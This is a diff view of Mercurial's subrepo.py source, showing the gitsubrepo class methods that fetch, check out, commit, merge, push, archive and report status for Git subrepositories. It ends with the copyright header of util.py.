1501 '''returns 2 things:
1498 a map from git branch to revision
1502 a map from git branch to revision
1499 a map from revision to branches'''
1503 a map from revision to branches'''
1500 branch2rev = {}
1504 branch2rev = {}
1501 rev2branch = {}
1505 rev2branch = {}
1502
1506
1503 out = self._gitcommand(['for-each-ref', '--format',
1507 out = self._gitcommand(['for-each-ref', '--format',
1504 '%(objectname) %(refname)'])
1508 '%(objectname) %(refname)'])
1505 for line in out.split('\n'):
1509 for line in out.split('\n'):
1506 revision, ref = line.split(' ')
1510 revision, ref = line.split(' ')
1507 if (not ref.startswith('refs/heads/') and
1511 if (not ref.startswith('refs/heads/') and
1508 not ref.startswith('refs/remotes/')):
1512 not ref.startswith('refs/remotes/')):
1509 continue
1513 continue
1510 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1514 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1511 continue # ignore remote/HEAD redirects
1515 continue # ignore remote/HEAD redirects
1512 branch2rev[ref] = revision
1516 branch2rev[ref] = revision
1513 rev2branch.setdefault(revision, []).append(ref)
1517 rev2branch.setdefault(revision, []).append(ref)
1514 return branch2rev, rev2branch
1518 return branch2rev, rev2branch
1515
1519
1516 def _gittracking(self, branches):
1520 def _gittracking(self, branches):
1517 'return map of remote branch to local tracking branch'
1521 'return map of remote branch to local tracking branch'
1518 # assumes no more than one local tracking branch for each remote
1522 # assumes no more than one local tracking branch for each remote
1519 tracking = {}
1523 tracking = {}
1520 for b in branches:
1524 for b in branches:
1521 if b.startswith('refs/remotes/'):
1525 if b.startswith('refs/remotes/'):
1522 continue
1526 continue
1523 bname = b.split('/', 2)[2]
1527 bname = b.split('/', 2)[2]
1524 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1528 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1525 if remote:
1529 if remote:
1526 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1530 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1527 tracking['refs/remotes/%s/%s' %
1531 tracking['refs/remotes/%s/%s' %
1528 (remote, ref.split('/', 2)[2])] = b
1532 (remote, ref.split('/', 2)[2])] = b
1529 return tracking
1533 return tracking
1530
1534
1531 def _abssource(self, source):
1535 def _abssource(self, source):
1532 if '://' not in source:
1536 if '://' not in source:
1533 # recognize the scp syntax as an absolute source
1537 # recognize the scp syntax as an absolute source
1534 colon = source.find(':')
1538 colon = source.find(':')
1535 if colon != -1 and '/' not in source[:colon]:
1539 if colon != -1 and '/' not in source[:colon]:
1536 return source
1540 return source
1537 self._subsource = source
1541 self._subsource = source
1538 return _abssource(self)
1542 return _abssource(self)
1539
1543
1540 def _fetch(self, source, revision):
1544 def _fetch(self, source, revision):
1541 if self._gitmissing():
1545 if self._gitmissing():
1542 source = self._abssource(source)
1546 source = self._abssource(source)
1543 self.ui.status(_('cloning subrepo %s from %s\n') %
1547 self.ui.status(_('cloning subrepo %s from %s\n') %
1544 (self._relpath, source))
1548 (self._relpath, source))
1545 self._gitnodir(['clone', source, self._abspath])
1549 self._gitnodir(['clone', source, self._abspath])
1546 if self._githavelocally(revision):
1550 if self._githavelocally(revision):
1547 return
1551 return
1548 self.ui.status(_('pulling subrepo %s from %s\n') %
1552 self.ui.status(_('pulling subrepo %s from %s\n') %
1549 (self._relpath, self._gitremote('origin')))
1553 (self._relpath, self._gitremote('origin')))
1550 # try only origin: the originally cloned repo
1554 # try only origin: the originally cloned repo
1551 self._gitcommand(['fetch'])
1555 self._gitcommand(['fetch'])
1552 if not self._githavelocally(revision):
1556 if not self._githavelocally(revision):
1553 raise error.Abort(_("revision %s does not exist in subrepo %s\n") %
1557 raise error.Abort(_("revision %s does not exist in subrepo %s\n") %
1554 (revision, self._relpath))
1558 (revision, self._relpath))
1555
1559
1556 @annotatesubrepoerror
1560 @annotatesubrepoerror
1557 def dirty(self, ignoreupdate=False):
1561 def dirty(self, ignoreupdate=False):
1558 if self._gitmissing():
1562 if self._gitmissing():
1559 return self._state[1] != ''
1563 return self._state[1] != ''
1560 if self._gitisbare():
1564 if self._gitisbare():
1561 return True
1565 return True
1562 if not ignoreupdate and self._state[1] != self._gitstate():
1566 if not ignoreupdate and self._state[1] != self._gitstate():
1563 # different version checked out
1567 # different version checked out
1564 return True
1568 return True
1565 # check for staged changes or modified files; ignore untracked files
1569 # check for staged changes or modified files; ignore untracked files
1566 self._gitupdatestat()
1570 self._gitupdatestat()
1567 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1571 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1568 return code == 1
1572 return code == 1
1569
1573
1570 def basestate(self):
1574 def basestate(self):
1571 return self._gitstate()
1575 return self._gitstate()
1572
1576
1573 @annotatesubrepoerror
1577 @annotatesubrepoerror
1574 def get(self, state, overwrite=False):
1578 def get(self, state, overwrite=False):
1575 source, revision, kind = state
1579 source, revision, kind = state
1576 if not revision:
1580 if not revision:
1577 self.remove()
1581 self.remove()
1578 return
1582 return
1579 self._fetch(source, revision)
1583 self._fetch(source, revision)
1580 # if the repo was set to be bare, unbare it
1584 # if the repo was set to be bare, unbare it
1581 if self._gitisbare():
1585 if self._gitisbare():
1582 self._gitcommand(['config', 'core.bare', 'false'])
1586 self._gitcommand(['config', 'core.bare', 'false'])
1583 if self._gitstate() == revision:
1587 if self._gitstate() == revision:
1584 self._gitcommand(['reset', '--hard', 'HEAD'])
1588 self._gitcommand(['reset', '--hard', 'HEAD'])
1585 return
1589 return
1586 elif self._gitstate() == revision:
1590 elif self._gitstate() == revision:
1587 if overwrite:
1591 if overwrite:
1588 # first reset the index to unmark new files for commit, because
1592 # first reset the index to unmark new files for commit, because
1589 # reset --hard will otherwise throw away files added for commit,
1593 # reset --hard will otherwise throw away files added for commit,
1590 # not just unmark them.
1594 # not just unmark them.
1591 self._gitcommand(['reset', 'HEAD'])
1595 self._gitcommand(['reset', 'HEAD'])
1592 self._gitcommand(['reset', '--hard', 'HEAD'])
1596 self._gitcommand(['reset', '--hard', 'HEAD'])
1593 return
1597 return
1594 branch2rev, rev2branch = self._gitbranchmap()
1598 branch2rev, rev2branch = self._gitbranchmap()
1595
1599
1596 def checkout(args):
1600 def checkout(args):
1597 cmd = ['checkout']
1601 cmd = ['checkout']
1598 if overwrite:
1602 if overwrite:
1599 # first reset the index to unmark new files for commit, because
1603 # first reset the index to unmark new files for commit, because
1600 # the -f option will otherwise throw away files added for
1604 # the -f option will otherwise throw away files added for
1601 # commit, not just unmark them.
1605 # commit, not just unmark them.
1602 self._gitcommand(['reset', 'HEAD'])
1606 self._gitcommand(['reset', 'HEAD'])
1603 cmd.append('-f')
1607 cmd.append('-f')
1604 self._gitcommand(cmd + args)
1608 self._gitcommand(cmd + args)
1605 _sanitize(self.ui, self.wvfs, '.git')
1609 _sanitize(self.ui, self.wvfs, '.git')
1606
1610
1607 def rawcheckout():
1611 def rawcheckout():
1608 # no branch to checkout, check it out with no branch
1612 # no branch to checkout, check it out with no branch
1609 self.ui.warn(_('checking out detached HEAD in subrepo %s\n') %
1613 self.ui.warn(_('checking out detached HEAD in subrepo %s\n') %
1610 self._relpath)
1614 self._relpath)
1611 self.ui.warn(_('check out a git branch if you intend '
1615 self.ui.warn(_('check out a git branch if you intend '
1612 'to make changes\n'))
1616 'to make changes\n'))
1613 checkout(['-q', revision])
1617 checkout(['-q', revision])
1614
1618
1615 if revision not in rev2branch:
1619 if revision not in rev2branch:
1616 rawcheckout()
1620 rawcheckout()
1617 return
1621 return
1618 branches = rev2branch[revision]
1622 branches = rev2branch[revision]
1619 firstlocalbranch = None
1623 firstlocalbranch = None
1620 for b in branches:
1624 for b in branches:
1621 if b == 'refs/heads/master':
1625 if b == 'refs/heads/master':
1622 # master trumps all other branches
1626 # master trumps all other branches
1623 checkout(['refs/heads/master'])
1627 checkout(['refs/heads/master'])
1624 return
1628 return
1625 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1629 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1626 firstlocalbranch = b
1630 firstlocalbranch = b
1627 if firstlocalbranch:
1631 if firstlocalbranch:
1628 checkout([firstlocalbranch])
1632 checkout([firstlocalbranch])
1629 return
1633 return
1630
1634
1631 tracking = self._gittracking(branch2rev.keys())
1635 tracking = self._gittracking(branch2rev.keys())
1632 # choose a remote branch already tracked if possible
1636 # choose a remote branch already tracked if possible
1633 remote = branches[0]
1637 remote = branches[0]
1634 if remote not in tracking:
1638 if remote not in tracking:
1635 for b in branches:
1639 for b in branches:
1636 if b in tracking:
1640 if b in tracking:
1637 remote = b
1641 remote = b
1638 break
1642 break
1639
1643
1640 if remote not in tracking:
1644 if remote not in tracking:
1641 # create a new local tracking branch
1645 # create a new local tracking branch
1642 local = remote.split('/', 3)[3]
1646 local = remote.split('/', 3)[3]
1643 checkout(['-b', local, remote])
1647 checkout(['-b', local, remote])
1644 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1648 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1645 # When updating to a tracked remote branch,
1649 # When updating to a tracked remote branch,
1646 # if the local tracking branch is downstream of it,
1650 # if the local tracking branch is downstream of it,
1647 # a normal `git pull` would have performed a "fast-forward merge"
1651 # a normal `git pull` would have performed a "fast-forward merge"
1648 # which is equivalent to updating the local branch to the remote.
1652 # which is equivalent to updating the local branch to the remote.
1649 # Since we are only looking at branching at update, we need to
1653 # Since we are only looking at branching at update, we need to
1650 # detect this situation and perform this action lazily.
1654 # detect this situation and perform this action lazily.
1651 if tracking[remote] != self._gitcurrentbranch():
1655 if tracking[remote] != self._gitcurrentbranch():
1652 checkout([tracking[remote]])
1656 checkout([tracking[remote]])
1653 self._gitcommand(['merge', '--ff', remote])
1657 self._gitcommand(['merge', '--ff', remote])
1654 _sanitize(self.ui, self.wvfs, '.git')
1658 _sanitize(self.ui, self.wvfs, '.git')
1655 else:
1659 else:
1656 # a real merge would be required, just checkout the revision
1660 # a real merge would be required, just checkout the revision
1657 rawcheckout()
1661 rawcheckout()
1658
1662
1659 @annotatesubrepoerror
1663 @annotatesubrepoerror
1660 def commit(self, text, user, date):
1664 def commit(self, text, user, date):
1661 if self._gitmissing():
1665 if self._gitmissing():
1662 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1666 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1663 cmd = ['commit', '-a', '-m', text]
1667 cmd = ['commit', '-a', '-m', text]
1664 env = encoding.environ.copy()
1668 env = encoding.environ.copy()
1665 if user:
1669 if user:
1666 cmd += ['--author', user]
1670 cmd += ['--author', user]
1667 if date:
1671 if date:
1668 # git's date parser silently ignores when seconds < 1e9
1672 # git's date parser silently ignores when seconds < 1e9
1669 # convert to ISO8601
1673 # convert to ISO8601
1670 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1674 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1671 '%Y-%m-%dT%H:%M:%S %1%2')
1675 '%Y-%m-%dT%H:%M:%S %1%2')
1672 self._gitcommand(cmd, env=env)
1676 self._gitcommand(cmd, env=env)
1673 # make sure commit works otherwise HEAD might not exist under certain
1677 # make sure commit works otherwise HEAD might not exist under certain
1674 # circumstances
1678 # circumstances
1675 return self._gitstate()
1679 return self._gitstate()
1676
1680
1677 @annotatesubrepoerror
1681 @annotatesubrepoerror
1678 def merge(self, state):
1682 def merge(self, state):
1679 source, revision, kind = state
1683 source, revision, kind = state
1680 self._fetch(source, revision)
1684 self._fetch(source, revision)
1681 base = self._gitcommand(['merge-base', revision, self._state[1]])
1685 base = self._gitcommand(['merge-base', revision, self._state[1]])
1682 self._gitupdatestat()
1686 self._gitupdatestat()
1683 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1687 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1684
1688
1685 def mergefunc():
1689 def mergefunc():
1686 if base == revision:
1690 if base == revision:
1687 self.get(state) # fast forward merge
1691 self.get(state) # fast forward merge
1688 elif base != self._state[1]:
1692 elif base != self._state[1]:
1689 self._gitcommand(['merge', '--no-commit', revision])
1693 self._gitcommand(['merge', '--no-commit', revision])
1690 _sanitize(self.ui, self.wvfs, '.git')
1694 _sanitize(self.ui, self.wvfs, '.git')
1691
1695
1692 if self.dirty():
1696 if self.dirty():
1693 if self._gitstate() != revision:
1697 if self._gitstate() != revision:
1694 dirty = self._gitstate() == self._state[1] or code != 0
1698 dirty = self._gitstate() == self._state[1] or code != 0
1695 if _updateprompt(self.ui, self, dirty,
1699 if _updateprompt(self.ui, self, dirty,
1696 self._state[1][:7], revision[:7]):
1700 self._state[1][:7], revision[:7]):
1697 mergefunc()
1701 mergefunc()
1698 else:
1702 else:
1699 mergefunc()
1703 mergefunc()
1700
1704
1701 @annotatesubrepoerror
1705 @annotatesubrepoerror
1702 def push(self, opts):
1706 def push(self, opts):
1703 force = opts.get('force')
1707 force = opts.get('force')
1704
1708
1705 if not self._state[1]:
1709 if not self._state[1]:
1706 return True
1710 return True
1707 if self._gitmissing():
1711 if self._gitmissing():
1708 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1712 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1709 # if a branch in origin contains the revision, nothing to do
1713 # if a branch in origin contains the revision, nothing to do
1710 branch2rev, rev2branch = self._gitbranchmap()
1714 branch2rev, rev2branch = self._gitbranchmap()
1711 if self._state[1] in rev2branch:
1715 if self._state[1] in rev2branch:
1712 for b in rev2branch[self._state[1]]:
1716 for b in rev2branch[self._state[1]]:
1713 if b.startswith('refs/remotes/origin/'):
1717 if b.startswith('refs/remotes/origin/'):
1714 return True
1718 return True
1715 for b, revision in branch2rev.iteritems():
1719 for b, revision in branch2rev.iteritems():
1716 if b.startswith('refs/remotes/origin/'):
1720 if b.startswith('refs/remotes/origin/'):
1717 if self._gitisancestor(self._state[1], revision):
1721 if self._gitisancestor(self._state[1], revision):
1718 return True
1722 return True
1719 # otherwise, try to push the currently checked out branch
1723 # otherwise, try to push the currently checked out branch
1720 cmd = ['push']
1724 cmd = ['push']
1721 if force:
1725 if force:
1722 cmd.append('--force')
1726 cmd.append('--force')
1723
1727
1724 current = self._gitcurrentbranch()
1728 current = self._gitcurrentbranch()
1725 if current:
1729 if current:
1726 # determine if the current branch is even useful
1730 # determine if the current branch is even useful
1727 if not self._gitisancestor(self._state[1], current):
1731 if not self._gitisancestor(self._state[1], current):
1728 self.ui.warn(_('unrelated git branch checked out '
1732 self.ui.warn(_('unrelated git branch checked out '
1729 'in subrepo %s\n') % self._relpath)
1733 'in subrepo %s\n') % self._relpath)
1730 return False
1734 return False
1731 self.ui.status(_('pushing branch %s of subrepo %s\n') %
1735 self.ui.status(_('pushing branch %s of subrepo %s\n') %
1732 (current.split('/', 2)[2], self._relpath))
1736 (current.split('/', 2)[2], self._relpath))
1733 ret = self._gitdir(cmd + ['origin', current])
1737 ret = self._gitdir(cmd + ['origin', current])
1734 return ret[1] == 0
1738 return ret[1] == 0
1735 else:
1739 else:
1736 self.ui.warn(_('no branch checked out in subrepo %s\n'
1740 self.ui.warn(_('no branch checked out in subrepo %s\n'
1737 'cannot push revision %s\n') %
1741 'cannot push revision %s\n') %
1738 (self._relpath, self._state[1]))
1742 (self._relpath, self._state[1]))
1739 return False
1743 return False
1740
1744
1741 @annotatesubrepoerror
1745 @annotatesubrepoerror
1742 def add(self, ui, match, prefix, explicitonly, **opts):
1746 def add(self, ui, match, prefix, explicitonly, **opts):
1743 if self._gitmissing():
1747 if self._gitmissing():
1744 return []
1748 return []
1745
1749
1746 (modified, added, removed,
1750 (modified, added, removed,
1747 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1751 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1748 clean=True)
1752 clean=True)
1749
1753
1750 tracked = set()
1754 tracked = set()
1751 # dirstates 'amn' warn, 'r' is added again
1755 # dirstates 'amn' warn, 'r' is added again
1752 for l in (modified, added, deleted, clean):
1756 for l in (modified, added, deleted, clean):
1753 tracked.update(l)
1757 tracked.update(l)
1754
1758
1755 # Unknown files not of interest will be rejected by the matcher
1759 # Unknown files not of interest will be rejected by the matcher
1756 files = unknown
1760 files = unknown
1757 files.extend(match.files())
1761 files.extend(match.files())
1758
1762
1759 rejected = []
1763 rejected = []
1760
1764
1761 files = [f for f in sorted(set(files)) if match(f)]
1765 files = [f for f in sorted(set(files)) if match(f)]
1762 for f in files:
1766 for f in files:
1763 exact = match.exact(f)
1767 exact = match.exact(f)
1764 command = ["add"]
1768 command = ["add"]
1765 if exact:
1769 if exact:
1766 command.append("-f") #should be added, even if ignored
1770 command.append("-f") #should be added, even if ignored
1767 if ui.verbose or not exact:
1771 if ui.verbose or not exact:
1768 ui.status(_('adding %s\n') % match.rel(f))
1772 ui.status(_('adding %s\n') % match.rel(f))
1769
1773
1770 if f in tracked: # hg prints 'adding' even if already tracked
1774 if f in tracked: # hg prints 'adding' even if already tracked
1771 if exact:
1775 if exact:
1772 rejected.append(f)
1776 rejected.append(f)
1773 continue
1777 continue
1774 if not opts.get('dry_run'):
1778 if not opts.get('dry_run'):
1775 self._gitcommand(command + [f])
1779 self._gitcommand(command + [f])
1776
1780
1777 for f in rejected:
1781 for f in rejected:
1778 ui.warn(_("%s already tracked!\n") % match.abs(f))
1782 ui.warn(_("%s already tracked!\n") % match.abs(f))
1779
1783
1780 return rejected
1784 return rejected
1781
1785
1782 @annotatesubrepoerror
1786 @annotatesubrepoerror
1783 def remove(self):
1787 def remove(self):
1784 if self._gitmissing():
1788 if self._gitmissing():
1785 return
1789 return
1786 if self.dirty():
1790 if self.dirty():
1787 self.ui.warn(_('not removing repo %s because '
1791 self.ui.warn(_('not removing repo %s because '
1788 'it has changes.\n') % self._relpath)
1792 'it has changes.\n') % self._relpath)
1789 return
1793 return
1790 # we can't fully delete the repository as it may contain
1794 # we can't fully delete the repository as it may contain
1791 # local-only history
1795 # local-only history
1792 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1796 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1793 self._gitcommand(['config', 'core.bare', 'true'])
1797 self._gitcommand(['config', 'core.bare', 'true'])
1794 for f, kind in self.wvfs.readdir():
1798 for f, kind in self.wvfs.readdir():
1795 if f == '.git':
1799 if f == '.git':
1796 continue
1800 continue
1797 if kind == stat.S_IFDIR:
1801 if kind == stat.S_IFDIR:
1798 self.wvfs.rmtree(f)
1802 self.wvfs.rmtree(f)
1799 else:
1803 else:
1800 self.wvfs.unlink(f)
1804 self.wvfs.unlink(f)
1801
1805
1802 def archive(self, archiver, prefix, match=None, decode=True):
1806 def archive(self, archiver, prefix, match=None, decode=True):
1803 total = 0
1807 total = 0
1804 source, revision = self._state
1808 source, revision = self._state
1805 if not revision:
1809 if not revision:
1806 return total
1810 return total
1807 self._fetch(source, revision)
1811 self._fetch(source, revision)
1808
1812
1809 # Parse git's native archive command.
1813 # Parse git's native archive command.
1810 # This should be much faster than manually traversing the trees
1814 # This should be much faster than manually traversing the trees
1811 # and objects with many subprocess calls.
1815 # and objects with many subprocess calls.
1812 tarstream = self._gitcommand(['archive', revision], stream=True)
1816 tarstream = self._gitcommand(['archive', revision], stream=True)
1813 tar = tarfile.open(fileobj=tarstream, mode='r|')
1817 tar = tarfile.open(fileobj=tarstream, mode='r|')
1814 relpath = subrelpath(self)
1818 relpath = subrelpath(self)
1815 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1819 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1816 for i, info in enumerate(tar):
1820 for i, info in enumerate(tar):
1817 if info.isdir():
1821 if info.isdir():
1818 continue
1822 continue
1819 if match and not match(info.name):
1823 if match and not match(info.name):
1820 continue
1824 continue
1821 if info.issym():
1825 if info.issym():
1822 data = info.linkname
1826 data = info.linkname
1823 else:
1827 else:
1824 data = tar.extractfile(info).read()
1828 data = tar.extractfile(info).read()
1825 archiver.addfile(prefix + self._path + '/' + info.name,
1829 archiver.addfile(prefix + self._path + '/' + info.name,
1826 info.mode, info.issym(), data)
1830 info.mode, info.issym(), data)
1827 total += 1
1831 total += 1
1828 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1832 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1829 unit=_('files'))
1833 unit=_('files'))
1830 self.ui.progress(_('archiving (%s)') % relpath, None)
1834 self.ui.progress(_('archiving (%s)') % relpath, None)
1831 return total
1835 return total
1832
1836
1833
1837
1834 @annotatesubrepoerror
1838 @annotatesubrepoerror
1835 def cat(self, match, prefix, **opts):
1839 def cat(self, match, prefix, **opts):
1836 rev = self._state[1]
1840 rev = self._state[1]
1837 if match.anypats():
1841 if match.anypats():
1838 return 1 #No support for include/exclude yet
1842 return 1 #No support for include/exclude yet
1839
1843
1840 if not match.files():
1844 if not match.files():
1841 return 1
1845 return 1
1842
1846
1843 for f in match.files():
1847 for f in match.files():
1844 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1848 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1845 fp = cmdutil.makefileobj(self._subparent, opts.get('output'),
1849 fp = cmdutil.makefileobj(self._subparent, opts.get('output'),
1846 self._ctx.node(),
1850 self._ctx.node(),
1847 pathname=self.wvfs.reljoin(prefix, f))
1851 pathname=self.wvfs.reljoin(prefix, f))
1848 fp.write(output)
1852 fp.write(output)
1849 fp.close()
1853 fp.close()
1850 return 0
1854 return 0
1851
1855
1852
1856
1853 @annotatesubrepoerror
1857 @annotatesubrepoerror
1854 def status(self, rev2, **opts):
1858 def status(self, rev2, **opts):
1855 rev1 = self._state[1]
1859 rev1 = self._state[1]
1856 if self._gitmissing() or not rev1:
1860 if self._gitmissing() or not rev1:
1857 # if the repo is missing, return no results
1861 # if the repo is missing, return no results
1858 return scmutil.status([], [], [], [], [], [], [])
1862 return scmutil.status([], [], [], [], [], [], [])
1859 modified, added, removed = [], [], []
1863 modified, added, removed = [], [], []
1860 self._gitupdatestat()
1864 self._gitupdatestat()
1861 if rev2:
1865 if rev2:
1862 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1866 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1863 else:
1867 else:
1864 command = ['diff-index', '--no-renames', rev1]
1868 command = ['diff-index', '--no-renames', rev1]
1865 out = self._gitcommand(command)
1869 out = self._gitcommand(command)
1866 for line in out.split('\n'):
1870 for line in out.split('\n'):
1867 tab = line.find('\t')
1871 tab = line.find('\t')
1868 if tab == -1:
1872 if tab == -1:
1869 continue
1873 continue
1870 status, f = line[tab - 1], line[tab + 1:]
1874 status, f = line[tab - 1], line[tab + 1:]
1871 if status == 'M':
1875 if status == 'M':
1872 modified.append(f)
1876 modified.append(f)
1873 elif status == 'A':
1877 elif status == 'A':
1874 added.append(f)
1878 added.append(f)
1875 elif status == 'D':
1879 elif status == 'D':
1876 removed.append(f)
1880 removed.append(f)
1877
1881
1878 deleted, unknown, ignored, clean = [], [], [], []
1882 deleted, unknown, ignored, clean = [], [], [], []
1879
1883
1880 command = ['status', '--porcelain', '-z']
1884 command = ['status', '--porcelain', '-z']
1881 if opts.get('unknown'):
1885 if opts.get('unknown'):
1882 command += ['--untracked-files=all']
1886 command += ['--untracked-files=all']
1883 if opts.get('ignored'):
1887 if opts.get('ignored'):
1884 command += ['--ignored']
1888 command += ['--ignored']
1885 out = self._gitcommand(command)
1889 out = self._gitcommand(command)
1886
1890
1887 changedfiles = set()
1891 changedfiles = set()
1888 changedfiles.update(modified)
1892 changedfiles.update(modified)
1889 changedfiles.update(added)
1893 changedfiles.update(added)
1890 changedfiles.update(removed)
1894 changedfiles.update(removed)
1891 for line in out.split('\0'):
1895 for line in out.split('\0'):
1892 if not line:
1896 if not line:
1893 continue
1897 continue
1894 st = line[0:2]
1898 st = line[0:2]
1895 #moves and copies show 2 files on one line
1899 #moves and copies show 2 files on one line
1896 if line.find('\0') >= 0:
1900 if line.find('\0') >= 0:
1897 filename1, filename2 = line[3:].split('\0')
1901 filename1, filename2 = line[3:].split('\0')
1898 else:
1902 else:
1899 filename1 = line[3:]
1903 filename1 = line[3:]
1900 filename2 = None
1904 filename2 = None
1901
1905
1902 changedfiles.add(filename1)
1906 changedfiles.add(filename1)
1903 if filename2:
1907 if filename2:
1904 changedfiles.add(filename2)
1908 changedfiles.add(filename2)
1905
1909
1906 if st == '??':
1910 if st == '??':
1907 unknown.append(filename1)
1911 unknown.append(filename1)
1908 elif st == '!!':
1912 elif st == '!!':
1909 ignored.append(filename1)
1913 ignored.append(filename1)
1910
1914
1911 if opts.get('clean'):
1915 if opts.get('clean'):
1912 out = self._gitcommand(['ls-files'])
1916 out = self._gitcommand(['ls-files'])
1913 for f in out.split('\n'):
1917 for f in out.split('\n'):
1914 if not f in changedfiles:
1918 if not f in changedfiles:
1915 clean.append(f)
1919 clean.append(f)
1916
1920
1917 return scmutil.status(modified, added, removed, deleted,
1921 return scmutil.status(modified, added, removed, deleted,
1918 unknown, ignored, clean)
1922 unknown, ignored, clean)
1919
1923
1920 @annotatesubrepoerror
1924 @annotatesubrepoerror
1921 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1925 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1922 node1 = self._state[1]
1926 node1 = self._state[1]
1923 cmd = ['diff', '--no-renames']
1927 cmd = ['diff', '--no-renames']
1924 if opts['stat']:
1928 if opts['stat']:
1925 cmd.append('--stat')
1929 cmd.append('--stat')
1926 else:
1930 else:
1927 # for Git, this also implies '-p'
1931 # for Git, this also implies '-p'
1928 cmd.append('-U%d' % diffopts.context)
1932 cmd.append('-U%d' % diffopts.context)
1929
1933
1930 gitprefix = self.wvfs.reljoin(prefix, self._path)
1934 gitprefix = self.wvfs.reljoin(prefix, self._path)
1931
1935
1932 if diffopts.noprefix:
1936 if diffopts.noprefix:
1933 cmd.extend(['--src-prefix=%s/' % gitprefix,
1937 cmd.extend(['--src-prefix=%s/' % gitprefix,
1934 '--dst-prefix=%s/' % gitprefix])
1938 '--dst-prefix=%s/' % gitprefix])
1935 else:
1939 else:
1936 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1940 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1937 '--dst-prefix=b/%s/' % gitprefix])
1941 '--dst-prefix=b/%s/' % gitprefix])
1938
1942
1939 if diffopts.ignorews:
1943 if diffopts.ignorews:
1940 cmd.append('--ignore-all-space')
1944 cmd.append('--ignore-all-space')
1941 if diffopts.ignorewsamount:
1945 if diffopts.ignorewsamount:
1942 cmd.append('--ignore-space-change')
1946 cmd.append('--ignore-space-change')
1943 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1947 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1944 and diffopts.ignoreblanklines:
1948 and diffopts.ignoreblanklines:
1945 cmd.append('--ignore-blank-lines')
1949 cmd.append('--ignore-blank-lines')
1946
1950
1947 cmd.append(node1)
1951 cmd.append(node1)
1948 if node2:
1952 if node2:
1949 cmd.append(node2)
1953 cmd.append(node2)
1950
1954
1951 output = ""
1955 output = ""
1952 if match.always():
1956 if match.always():
1953 output += self._gitcommand(cmd) + '\n'
1957 output += self._gitcommand(cmd) + '\n'
1954 else:
1958 else:
1955 st = self.status(node2)[:3]
1959 st = self.status(node2)[:3]
1956 files = [f for sublist in st for f in sublist]
1960 files = [f for sublist in st for f in sublist]
1957 for f in files:
1961 for f in files:
1958 if match(f):
1962 if match(f):
1959 output += self._gitcommand(cmd + ['--', f]) + '\n'
1963 output += self._gitcommand(cmd + ['--', f]) + '\n'
1960
1964
1961 if output.strip():
1965 if output.strip():
1962 ui.write(output)
1966 ui.write(output)
1963
1967
1964 @annotatesubrepoerror
1968 @annotatesubrepoerror
1965 def revert(self, substate, *pats, **opts):
1969 def revert(self, substate, *pats, **opts):
1966 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1970 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1967 if not opts.get('no_backup'):
1971 if not opts.get('no_backup'):
1968 status = self.status(None)
1972 status = self.status(None)
1969 names = status.modified
1973 names = status.modified
1970 for name in names:
1974 for name in names:
1971 bakname = scmutil.origpath(self.ui, self._subparent, name)
1975 bakname = scmutil.origpath(self.ui, self._subparent, name)
1972 self.ui.note(_('saving current version of %s as %s\n') %
1976 self.ui.note(_('saving current version of %s as %s\n') %
1973 (name, bakname))
1977 (name, bakname))
1974 self.wvfs.rename(name, bakname)
1978 self.wvfs.rename(name, bakname)
1975
1979
1976 if not opts.get('dry_run'):
1980 if not opts.get('dry_run'):
1977 self.get(substate, overwrite=True)
1981 self.get(substate, overwrite=True)
1978 return []
1982 return []
1979
1983
1980 def shortid(self, revid):
1984 def shortid(self, revid):
1981 return revid[:7]
1985 return revid[:7]
1982
1986
1983 types = {
1987 types = {
1984 'hg': hgsubrepo,
1988 'hg': hgsubrepo,
1985 'svn': svnsubrepo,
1989 'svn': svnsubrepo,
1986 'git': gitsubrepo,
1990 'git': gitsubrepo,
1987 }
1991 }
@@ -1,3764 +1,3765 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
